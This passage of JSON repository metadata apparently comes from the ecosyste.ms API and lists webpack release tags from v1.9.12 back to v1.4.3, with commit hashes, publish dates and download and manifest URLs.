z/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/ta